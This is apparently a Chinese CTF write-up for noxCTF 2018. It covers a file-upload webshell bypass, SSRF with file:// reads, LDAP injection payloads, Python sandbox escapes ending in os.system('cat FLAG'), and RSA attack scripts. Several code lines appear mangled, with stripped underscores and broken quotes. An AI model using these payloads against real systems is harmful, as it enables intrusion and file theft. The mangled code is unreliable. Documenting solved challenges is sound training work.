noxctfwp

菜鸡上去划了几道题

web

reference

看 js 发现有个判断是否来自google

然后把refer抓包改成google.com拿到base64 解码即可 送分题

MyFileUploader

文件上传拿shell

我直接扫目录发现upload 打开发现一个don’t open it

打开一看是 htaccess

1
2
Options +Indexes
AddType application/x-httpd-php .cyb3r

那传 eeee.cyber

提示后缀不是 jpg png 等

这里upload能看到其他人传的文件 发现 xxx.cyber.jpg%00

我仿照也改了下 上传但ls不行 我又试了个phpinfo()发现可以解析的

最后蚁剑连上了

不过这个绕过我感觉有点奇怪 一般不是 xxx.cyber%00.jpg (nginx<8.03) ???

这个传上去%00会变%2500直接点目录会404

赛后我看 xxx.png.cyb3r 也可以

hiddenDOM

。。这题就差一点 对js不太熟。。。

该网站称,它将在网页中找到隐藏的元素 有一个填url的地方 大概就是个ssrf

先试试它自己的网站 发现回显了一些东西

源码有flag绝对路径 直接想到了file协议

?target=file:///var/www/html/flag.txt

但是,它什么也没有返回。这意味着该标志不包含“hidden”一词。我们需要读取整个文件而不是读取包含“hidden”的行

在源码中发现 js 美化一下

1
2
3
4
5
6
var _0x3bc3 = ["main_form", "getElementById", "input", "createElement", "name", "expression", "setAttribute", "type", "text", "placeholder", "/<[^<>]{1,}hidden[^<>]{1,}>/"];
var _frss = document[_0x3bc3[1]](_0x3bc3[0]);
var _xEger = document[_0x3bc3[3]](_0x3bc3[2]);
_xEger[_0x3bc3[6]](_0x3bc3[4], _0x3bc3[5]);
_xEger[_0x3bc3[6]](_0x3bc3[7], _0x3bc3[8]);
_xEger[_0x3bc3[6]](_0x3bc3[9], _0x3bc3[10])

可以发现expression

<input name="expression" type="text" placeholder="/<[^<>]{1,}hidden[^<>]{1,}>/">

expression是个正则表达式 它导致flag.txt的内容显不出来

可以该点东西传一下试试比如?expression=/[^<>]{1}id[^<>]{1}>/&target=http://chal.noxale.com:5588

这里把默认的 hidden改成了 id 可以发现回显不同了 证明我们的猜测是对的 我们可以修改它的正则

其实我感觉对js熟或者有经验的师傅看题目说明大概就能猜到是个正则

最后直接改?target=file:///var/www/html/flag.txt&expression=/.*/

补一下 在你输入它自己网站时会多个js

1
2
3
4
5
6
7
8
9
10
11
var _0x2b80 = ["slow", "fadeOut", "#hidden_elements", "click", "#hideArea", "ready", "fadeIn", "#showArea"];
$(document)[_0x2b80[5]](function() {
$(_0x2b80[4])[_0x2b80[3]](function() {
$(_0x2b80[2])[_0x2b80[1]](_0x2b80[0]);
});
});
$(document)[_0x2b80[5]](function() {
$(_0x2b80[7])[_0x2b80[3]](function() {
$(_0x2b80[2])[_0x2b80[6]](_0x2b80[0]);
});
});

美化下大概是

1
2
3
4
5
6
7
8
9
10
$(document)["ready"](function() {
$("#hideArea")["click"](function() {
$("#hidden_elements")["fadeOut"]("slow");
});
});
$(document)["ready"](function() {
$("#showArea")["click"](function() {
$("#hidden_elements")["fadeIn"]("slow");
});
});

由于我根本不熟js当时我还看了老半天以为有啥子东西 结果赛后大佬说就是个控制那个显示框有没的。。。没一点用

参考
https://rawsec.ml/en/noxCTF-2018-write-ups/#292-python-for-fun-misc
https://github.com/xpinked/ctf-writeups/blob/master/noxCTF18/Web/HiddenDOM/Solution.md
https://www.pwndiary.com/write-ups/noxctf-2018-hiddendom-write-up-web670/

Dictionary of obscure sorrows

ldap注入 又到了交学费的时间

ldap及注入介绍
https://www.cnblogs.com/bendawang/p/5156562.html

ldap特定错误(可用来判断时ldap)
https://blog.csdn.net/zdwzzu2006/article/details/8550910

比如飘零师傅提到过的 Bad search filter

ldap是轻量目录访问协议

回到题目

页面内容看起来比较多 随便点击一个连接 观察url为 /word.php?page=Sonder

有点像文件读取 读自己试试 /word.php?page=word.php

发现返回为 Query returned empty 这个有点类似数据库查询为空的感觉

应该就不是文件读取了 有经验的话应该会尝试ldap注入

尝试通配符 *

/word.php?page=S* 返回正常

/word.php?page=B* 又是 Query returned empty

这里基本确定了是ldap

不放心的话再试试

/word.php?page=*)(objectclass=S* 正常

/word.php?page=*)(objectclass=B* Query returned empty

顺便一提 objectclass 是ldap内置数据类型 一个条目至少必须包含一个 objectclass 属性 且至少赋予一个值

ok确定了大方向开始寻找利用方法

不带参数访问试试 http://54.152.220.222/word.php (利用报错)

发现回显 Missing RDN inside ObjectClass(document)

好我们知道了这里的ObjectClass 是 documnt

去查官方手册 https://oav.net/mirrors/LDAP-ObjectClasses.html

发现 document objectclass 有这些 attributes:

commonName
description
seeAlso
l
o
ou
documentTitle
documentVersion
documentAuthor
documentLocation
documentPublisher

不熟的话挨个试吧

1
2
3
4
5
6
7
8
9
10
11
GET /word.php?page=*)(cn=* ⇒ Query returned empty
GET /word.php?page=*)(description=* ⇒ Normal response★
GET /word.php?page=*)(seeAlso=*  ⇒ Query returned empty
GET /word.php?page=*)(l=*   ⇒ Query returned empty
GET /word.php?page=*)(o=*   ⇒ Query returned empty
GET /word.php?page=*)(ou=*  ⇒ Query returned empty
GET /word.php?page=*)(documentTitle=*  ⇒ Query returned empty
GET /word.php?page=*)(documentVersion=*  ⇒ Query returned empty
GET /word.php?page=*)(documentAuthor=*  ⇒ Query returned empty
GET /word.php?page=*)(documentAuthor=*  ⇒ Query returned empty
GET /word.php?page=*)(documentPublisher=* ⇒ Normal response★

结合已知flag格式 noxctf{xxx}

最终payload 有点类似sql闭合’的操作

/word.php?page=*)(description=*noxctf*

参考
https://rawsec.ml/en/noxCTF-2018-write-ups/#292-python-for-fun-misc
https://ctftime.org/writeup/10967

misc

python for fun

py沙盒题 py3的 好像3和2利用上还是有区别的 但菜鸡的我还不清楚。。

这题做的zz了 光想着闭合) 注释后面的): 但换行和对齐原因就是不行

结果形参就能直接打印

第一这个连''.__class__.__base__之类的都不用都不用

a,b=print(“toto”) 发现有回显

a,b=print(exec(“import os”),eval(“os.listdir(‘.’)”)) 看到 FLAG字样

a,b=print(open(“FLAG”, “r”).read()) 读取

或者

print(import(‘os’).listdir()

print(open(‘FLAG’,’r’).read())

或者

print(import(“subprocess”).check_output([“ls”,”-la”]))

print(import(“subprocess”).check_output([“cat”,”FLAG”]))

或者

a=exec(‘import subprocess’),b=exec(“print(subprocess.geoutput(“ls”))”)

a=exec(‘import subprocess’),b=exec(“print(subprocess.geoutput(“cat FLAG”))”)

或者

import(‘os’).system(‘cat FLAG’)

因为不太熟 就把看到的都记录下

python for fun 2

相比第一个加了黑名单

需要一步步寻找

‘’.class.base.subclasses() 出发

1
[<class 'type'>, <class 'weakref'>, <class 'weakcallableproxy'>, <class 'weakproxy'>, <class 'int'>, <class 'bytearray'>, <class 'bytes'>, <class 'list'>, <class 'NoneType'>, <class 'NotImplementedType'>, <class 'traceback'>, <class 'super'>, <class 'range'>, <class 'dict'>, <class 'dict_keys'>, <class 'dict_values'>, <class 'dict_items'>, <class 'odict_iterator'>, <class 'set'>, <class 'str'>, <class 'slice'>, <class 'staticmethod'>, <class 'complex'>, <class 'float'>, <class 'frozenset'>, <class 'property'>, <class 'managedbuffer'>, <class 'memoryview'>, <class 'tuple'>, <class 'enumerate'>, <class 'reversed'>, <class 'stderrprinter'>, <class 'code'>, <class 'frame'>, <class 'builtin_function_or_method'>, <class 'method'>, <class 'function'>, <class 'mappingproxy'>, <class 'generator'>, <class 'getset_descriptor'>, <class 'wrapper_descriptor'>, <class 'method-wrapper'>, <class 'ellipsis'>, <class 'member_descriptor'>, <class 'types.SimpleNamespace'>, <class 'PyCapsule'>, <class 'longrange_iterator'>, <class 'cell'>, <class 'instancemethod'>, <class 'classmethod_descriptor'>, <class 'method_descriptor'>, <class 'callable_iterator'>, <class 'iterator'>, <class 'coroutine'>, <class 'coroutine_wrapper'>, <class 'moduledef'>, <class 'module'>, <class 'EncodingMap'>, <class 'fieldnameiterator'>, <class 'formatteriterator'>, <class 'filter'>, <class 'map'>, <class 'zip'>, <class 'BaseException'>, <class 'hamt'>, <class 'hamt_array_node'>, <class 'hamt_bitmap_node'>, <class 'hamt_collision_node'>, <class 'keys'>, <class 'values'>, <class 'items'>, <class 'Context'>, <class 'ContextVar'>, <class 'Token'>, <class 'Token.MISSING'>, <class '_frozen_importlib._ModuleLock'>, <class '_frozen_importlib._DummyModuleLock'>, <class '_frozen_importlib._ModuleLockManager'>, <class '_frozen_importlib._installed_safely'>, <class '_frozen_importlib.ModuleSpec'>, <class '_frozen_importlib.BuiltinImporter'>, <class 'classmethod'>, <class '_frozen_importlib.FrozenImporter'>, <class '_frozen_importlib._ImportLockContext'>, <class '_thread._localdummy'>, <class '_thread._local'>, <class '_thread.lock'>, <class '_thread.RLock'>, <class 'zipimport.zipimporter'>, <class '_frozen_importlib_external.WindowsRegistryFinder'>, <class '_frozen_importlib_external._LoaderBasics'>, <class '_frozen_importlib_external.FileLoader'>, <class '_frozen_importlib_external._NamespacePath'>, <class '_frozen_importlib_external._NamespaceLoader'>, <class '_frozen_importlib_external.PathFinder'>, <class '_frozen_importlib_external.FileFinder'>, <class '_io._IOBase'>, <class '_io._BytesIOBuffer'>, <class '_io.IncrementalNewlineDecoder'>, <class 'posix.ScandirIterator'>, <class 'posix.DirEntry'>, <class 'codecs.Codec'>, <class 'codecs.IncrementalEncoder'>, <class 'codecs.IncrementalDecoder'>, <class 'codecs.StreamReaderWriter'>, <class 'codecs.StreamRecoder'>, <class '_abc_data'>, <class 'abc.ABC'>, <class 'dict_itemiterator'>, <class 'collections.abc.Hashable'>, <class 'collections.abc.Awaitable'>, <class 'collections.abc.AsyncIterable'>, <class 'async_generator'>, <class 'collections.abc.Iterable'>, <class 'bytes_iterator'>, <class 'bytearray_iterator'>, <class 'dict_keyiterator'>, <class 'dict_valueiterator'>, <class 'list_iterator'>, <class 'list_reverseiterator'>, <class 'range_iterator'>, <class 'set_iterator'>, <class 'str_iterator'>, <class 'tuple_iterator'>, <class 'collections.abc.Sized'>, <class 'collections.abc.Container'>, <class 'collections.abc.Callable'>, <class 'os._wrap_close'>, <class '_sitebuiltins.Quitter'>, <class '_sitebuiltins._Printer'>, <class '_sitebuiltins._Helper'>]

见到大体上两种思路

一种找可以call sys 的 再引入 os

查资料发现可用的

‘’.class.mro[1].subclasses()[104]


Using init to initialize the class and globals to access the global namespace of the module in which the function was defined.

So from this namespace we are able to call sys.

‘’.class.mro[1].subclasses()[104].init.globals[“sys”]


Then it’s easy to import os:
发现sys成功

‘’.class.mro[1].subclasses()[104].init.globals[“sys”].modules[“os”]

os成功

‘’.class.mro[1].subclasses()[104].init.globals[“sys”].modules[“os”].system(“cat FLAG”)

还有一种直接找个带os的

搜os发现 os._wrap_close 有机会

[].class.base.subclasses()[127].dict

[].class.base.subclasses()[127].init.globals

发现有 listdir

[].class.base.subclasses()[127].init.globals‘system’)

找的方法没什么捷径 全打出来搜os 或者搜文档找以前类似的wp 手动还是很费时的

参考
https://www.pwndiary.com/write-ups/noxctf-2018-python-for-fun-2-write-up-misc634/
https://rawsec.ml/en/noxCTF-2018-write-ups/#634-python-for-fun-2-misc

Read Between The Lines

这题也差一点 没想到去搜空白符解密。。太年轻了

file message.code
message.code: gzip compressed data, was “message”, last modified: Fri Jul 20 12:53:57 2018, from Unix

查了下是liunx下的压缩文件

改成 tar.gz 7z解出来

发现是 jsfuck 下面是空白符 有点像摩斯 但有三种又不是摩斯

字节是空格0x20,制表符0x09和换行符0x0a

jsfuck跑了下 nope 我还以为是损坏的得修复 赛后才知道 nope就是结果。。

那就是下面的空白符了 考察搜索能力 搜到网站解密

https://vii5ard.github.io/whitespace/

点击run出结果

参考
https://w4.dk/ctf/writeup/2

crypto

记几道rsa的题

Chop Suey

1
2
3
oday I ate in a Chinese restaurant and got myself a fortune cookie. These things usually contain a note with a nice sentence or phrase, but mine had numbers in it instead! Can you help me find the meaning of the numbers?
p = 8637633767257008567099653486541091171320491509433615447539162437911244175885667806398411790524083553445158113502227745206205327690939504032994699902053229 q = 12640674973996472769176047937170883420927050821480010581593137135372473880595613737337630629752577346147039284030082593490776630572584959954205336880228469 dp = 6500795702216834621109042351193261530650043841056252930930949663358625016881832840728066026150264693076109354874099841380454881716097778307268116910582929 dq = 783472263673553449019532580386470672380574033551303889137911760438881683674556098098256795673512201963002175438762767516968043599582527539160811120550041 c = 24722305403887382073567316467649080662631552905960229399079107995602154418176056335800638887527614164073530437657085079676157350205351945222989351316076486573599576041978339872265925062764318536089007310270278526159678937431903862892400747915525118983959970607934142974736675784325993445942031372107342103852

泄露 dp dq 刚刚在飘零师傅博客见过 直接拿脚本改了改就过了

WTF

N = “lObAbAbSBlZOOEBllOEbblTlOAbOlTSBATZBbOSAEZTZEAlSOggTggbTlEgBOgSllEEOEZZOSSAOlBlAgBBBBbbOOSSTOTEOllbZgElgbZSZbbSTTOEBZZSBBEEBTgESEgAAAlAOAEbTZBZZlOZSOgBAOBgOAZEZbOBZbETEOSBZSSElSSZlbBSgbTBOTBSBBSOZOAEBEBZEZASbOgZBblbblTSbBTObAElTSTOlSTlATESEEbSTBOlBlZOlAOETAZAgTBTSAEbETZOlElBEESObbTOOlgAZbbOTBOBEgAOBAbZBObBTg”
e = “lBlbSbTASTTSZTEASTTEBOOAEbEbOOOSBAgABTbZgSBAZAbBlBBEAZlBlEbSSSETAlSOlAgAOTbETAOTSZAZBSbOlOOZlZTETAOSSSlTZOElOOABSZBbZTSAZSlASTZlBBEbEbOEbSTAZAZgAgTlOTSEBEAlObEbbgZBlgOEBTBbbSZAZBBSSZBOTlTEAgBBSZETAbBgEBTATgOZBTllOOSSTlSSTOSSZSZAgSZATgbSOEOTgTTOAABSZEZBEAZBOOTTBSgSZTZbOTgZTTElSOATOAlbBZTBlOTgOSlETgTBOglgETbT”
c = “SOSBOEbgOZTZBEgZAOSTTSObbbbTOObETTbBAlOSBbABggTOBSObZBbbggggZZlbBblgEABlATBESZgASBbOZbASbAAOZSSgbAOZlEgTAlgblBTbBSTAEBgEOEbgSZgSlgBlBSZOObSlgAOSbbOOgEbllAAZgBATgEAZbBEBOAAbZTggbOEZSSBOOBZZbAAlTBgBOglTSSESOTbbSlTAZATEOZbgbgOBZBBBBTBTOSBgEZlOBTBSbgbTlZBbbOBbTSbBASBTlglSEAEgTOSOblAbEgBAbOlbOETAEZblSlEllgTTbbgb”

emmm 一个替换 然后 Wiener’s Attack

‘O’ –> 0
‘l’ –> 1
‘Z’ –> 2
‘E’ –> 3
‘A’ –> 4
‘S’ –> 5
‘b’ –> 6
‘T’ –> 7
‘B’ –> 8
‘g’ –> 9

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
rom sage.all import *
from Crypto.Util.number import *
def mapping(str1):
for i in str1:
if i not in "AbEglOSBTZ":
print i
str1 = str1.replace("O", '0')
str1 = str1.replace("l", '1')
str1 = str1.replace("Z", '2')
str1 = str1.replace("E", '3')
str1 = str1.replace("A", '4')
str1 = str1.replace("S", '5')
str1 = str1.replace("b", '6')
str1 = str1.replace("T", '7')
str1 = str1.replace("B", '8')
str1 = str1.replace("g", '9')
return str1
def wiener(e, n):
m = 12345
c = pow(m, e, n)
lst = continued_fraction(Integer(e)/Integer(n))
conv = lst.convergents()
for i in conv:
k = i.numerator()
d = int(i.denominator())
try:
m1 = pow(c, d, n)
if m1 == m:
print "[*] Found d: ", d
return d
except:
continue
return -1
N = "lObAbAbSBlZOOEBllOEbblTlOAbOlTSBATZBbOSAEZTZEAlSOggTggbTlEgBOgSllEEOEZZOSSAOlBlAgBBBBbbOOSSTOTEOllbZgElgbZSZbbSTTOEBZZSBBEEBTgESEgAAAlAOAEbTZBZZlOZSOgBAOBgOAZEZbOBZbETEOSBZSSElSSZlbBSgbTBOTBSBBSOZOAEBEBZEZASbOgZBblbblTSbBTObAElTSTOlSTlATESEEbSTBOlBlZOlAOETAZAgTBTSAEbETZOlElBEESObbTOOlgAZbbOTBOBEgAOBAbZBObBTg"
e = "lBlbSbTASTTSZTEASTTEBOOAEbEbOOOSBAgABTbZgSBAZAbBlBBEAZlBlEbSSSETAlSOlAgAOTbETAOTSZAZBSbOlOOZlZTETAOSSSlTZOElOOABSZBbZTSAZSlASTZlBBEbEbOEbSTAZAZgAgTlOTSEBEAlObEbbgZBlgOEBTBbbSZAZBBSSZBOTlTEAgBBSZETAbBgEBTATgOZBTllOOSSTlSSTOSSZSZAgSZATgbSOEOTgTTOAABSZEZBEAZBOOTTBSgSZTZbOTgZTTElSOATOAlbBZTBlOTgOSlETgTBOglgETbT"
c = "SOSBOEbgOZTZBEgZAOSTTSObbbbTOObETTbBAlOSBbABggTOBSObZBbbggggZZlbBblgEABlATBESZgASBbOZbASbAAOZSSgbAOZlEgTAlgblBTbBSTAEBgEOEbgSZgSlgBlBSZOObSlgAOSbbOOgEbllAAZgBATgEAZbBEBOAAbZTggbOEZSSBOOBZZbAAlTBgBOglTSSESOTbbSlTAZATEOZbgbgOBZBBBBTBTOSBgEZlOBTBSbgbTlZBbbOBbTSbBASBTlglSEAEgTOSOblAbEgBAbOlbOETAEZblSlEllgTTbbgb"
N = int(mapping(N))
e = int(mapping(e))
c = int(mapping(c))
d = wiener(e, N)
print long_to_bytes(pow(c, d, N))

诶 这种题看的胃疼 有点脑洞但很简单没做出来就很难受

Trinity (三位一体)

Neo, you are the chosen one. The only person who can make sense of these numbers. Do it.

N = 33131032421200003002021431224423222240014241042341310444114020300324300210433321420203120221240340022003120214232243410414310424424121420444444332300024413012202242231020110441104403011330232301410133121430322331240243040240441303324313210101042224013312221140043402322221423140240340320001222102334133334004234312230211341021011022123324130302443133000130340402010444244312013000033411004243201020340144040401000344200122304221144200141300 c = 31002000423403330424420042141441332034130100212303031120234022241030142344031241244024024411020011214114020122403240223213120421301230320442200330000401143410214132122331124324201001414042241134230432220124111240213220310113122122300402200312000211023002334114320140431134031113423014023141220133333314240242313433321130210241311111142443003244012334003404431422340040122411132300024223442044124041102102310022200312321434303012203230104224

N = 30224000004042141014442213333414314001101104432222314441200222024300114114111412322333133130442111302123120432223312012144443421004123221414441324443442430231122214322440230243210224213224403201002011322401112104323214322120342424313404431402221202434310004234200243233114430021421241403341412000434421133022402030122303333432424403120424012230124223201130321122004422241113440301213242031111030244234402112210122441123000220334414014304411 c = 11220020340401343033021412400440442321004132104300030323314142334414422234340104220033403320312403001144001421011210323444031213403212340044434414423302013011013404210222030200241332110202241413044304114424031012102010031010433420423441241142442032121111223203112133031033341442343334332202440012120033333043222342143334412202301244001304140142320221012402443104001341431312112343342411311341442204333042200231414411113414204433340411224034

N = 33220032441004111143422212304312133144210323333242234104134041203423000331442031133310134423121213020031204104432443114103300433311002101302014002001122201230002004134204000400222021022312211131411212433321113223033212402242314121403130314444413440302442011142324442403003000334021303212130321334302040130424333000131402303012103411333440444042124224011310320301334123133000433204030244001132400413032403432343014310240144013024232142402032 c = 10013444120141130322433204124002242224332334011124210012440241402342100410331131441303242011002101323040403311120421304422222200324402244243322422444414043342130111111330022213203030324422101133032212042042243101434342203204121042113212104212423330331134311311114143200011240002111312122234340003403312040401043021433112031334324322123304112340014030132021432101130211241134422413442312013042141212003102211300321404043012124332013240431242

像广播攻击 但不行

广播攻击:模数n、密文c不同,明文m、加密指数e相同。一般会是e=k,然后给k组数据

观察只有0-4 先转10 进制再广播。。

额 现在rsa把坑点放在了第一步orz